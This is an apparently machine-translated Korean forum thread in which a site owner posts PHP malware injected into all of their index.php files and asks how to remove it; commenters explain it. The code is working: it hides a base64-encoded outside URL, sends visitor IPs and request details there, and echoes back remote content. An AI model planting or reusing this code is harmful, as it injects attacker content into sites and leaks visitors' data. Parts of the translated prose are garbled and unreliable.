0
이 악성 코드-작업
<?php
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&& (strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode('aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
$stCurlHandle = curl_init($stCurlLink);
}
}
if ($stCurlHandle !== NULL)
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
?>
이
내 서버의 모든 index.php에 파일에 고정되어 그것의 아주 나쁜 내 사이트에 살고있는 악성 코드입니다, 지금은 모든 인덱스를 청소하려면 .PHP SSH 또는 원격에 CentOS의 페이지, 난 간단한 PHP 코드와 정규식 포함 (아마도)과의 수 생각, 내가 너무 많은덕분에 [랭 욕실 내 약한 죄송이 스크립트에 필요한
실제 질문은 무엇입니까? 해당 코드 스 니펫을 제거하는 방법은 무엇입니까? 사실, 아무 것도하지 않는 것 같습니다. 사용자의 IP/브라우저와 요청 된 URL로 'rebostat.com'을 핑합니다. 즉, 전 세계 모든 광고 서버와 거의 같습니다. –
코드 스 니핏 (snippits)을 검색하면 더 많은 정보를 얻을 수 있습니다. 취약한 소프트웨어가 설치된 것처럼 보입니다. –
@Javid,이 악성 코드와 일치하는 모든 파일을 찾을 수 있도록 솔루션을 조합하십시오. 그것의 여기 (질문은 내가 제출할 수 있기 전에 닫혔다) : http : // codepad.org/nIvotncQ' 그것이 도움이되기를 바란다. –